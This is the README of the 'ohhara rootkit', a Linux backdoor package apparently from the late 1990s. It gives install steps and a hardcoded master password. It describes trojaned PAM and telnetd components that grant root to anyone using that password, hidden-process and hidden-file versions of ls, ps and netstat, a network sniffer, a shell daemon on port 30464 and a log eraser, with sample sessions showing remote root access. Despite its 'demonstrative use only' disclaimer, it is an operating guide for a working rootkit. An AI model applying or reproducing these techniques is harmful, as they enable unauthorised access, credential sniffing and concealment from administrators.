ohhara rootkit 1. What is ohhara rootkit? Ohhara rootkit is a backdoor for linux ( it's tested only in the x86 redhat linux 6.0 ) This program is only for demonstrative use only. USE IT AT YOUR OWN RISK! 2. How to install ohhara rootkit? ( edit bin/glibc2.1/var/lock/subsys/...datafile.../...ps... bin/glibc2.1/var/lock/subsys/...datafile.../...file... bin/glibc2.1/var/lock/subsys/...datafile.../...port... bin/glibc2.1/var/lock/subsys/...datafile.../...net... ) cd bin/glibc2.1 ./install-ohhara-rootkit vi /etc/inetd.conf ( change in.telnetd to telnetd ) killall -HUP inetd 3. How to uninstall ohhara rootkit? cd bin/glibc2.1 ./uninstall-ohhara-rootkit vi /etc/inetd.conf ( change telnetd to in.telnetd ) killall -HUP inetd vi /etc/rc.d/rc.local ( remove in.inetd and in.smbd startup code ) 4. How to use ohhara rootkit? /lib/security/pam_pwdb.so Trojan pam. Anyone can login any account with password 'gkfkqo79' ---------- $ telnet hacked.com Trying xxx.xxx.xxx.xxx... Connected to hacked.com Escape character is '^]'. login: bin Password: ( gkfkqo79 ) bash$ whoami bin bash$ su root Password: ( gkfkqo79 ) bash# whoami root bash# ---------- /bin/chgrp /bin/chmod /bin/chown /bin/cp /bin/ln /bin/ls /bin/mkdir /bin/mknod /bin/touch /bin/ps /bin/netstat /bin/rm /bin/rmdir /bin/mv /usr/bin/dir /usr/bin/du /usr/bin/mkfifo /usr/bin/vdir /usr/bin/oldps /usr/bin/top /usr/bin/find Hide process, file, port, and network. hidden file list is in the /var/lock/subsys/...datafile.../ /usr/sbin/telnetd Trojan telnetd Anyone can get root with below command. ---------- $ TERM=gkfkqo79 ; export TERM ; telnet hacked.com Trying xxx.xxx.xxx.xxx... Connected to hacked.com Escape character is '^]'. bash# whoami root bash# ---------- /usr/sbin/in.smbd Linux sniffer /var/lock/subsys/...datafile.../...datafile.../in.smbd.log Linux sniffer logfile /usr/sbin/in.inetd Shell spawn daemon in 30464 tcp port ( password is 'gkfkqo79' ) ---------- $ telnet hacked.com 30464 Trying xxx.xxx.xxx.xxx... Connected to hacked.com Escape character is '^]'. gkfkqo79 whoami; root : command not found ---------- /usr/sbin/fixdate Log eraser ( zap2 ) /var/lock/subsys/...datafile.../...ps... Hidden process list /var/lock/subsys/...datafile.../...file... Hidden file list /var/lock/subsys/...datafile.../...port... Hidden port list /var/lock/subsys/...datafile.../...net... Hidden network list ---------------------------------------------------------------------------- Taeho Oh ( ohhara@4dl.com, ohhara@postech.edu ) http://postech.edu/~ohhara 4DL ( 4th Dimension Laboratory ) http://4dl.com Postech ( Pohang University of Science and Technology ) http://postech.edu ----------------------------------------------------------------------------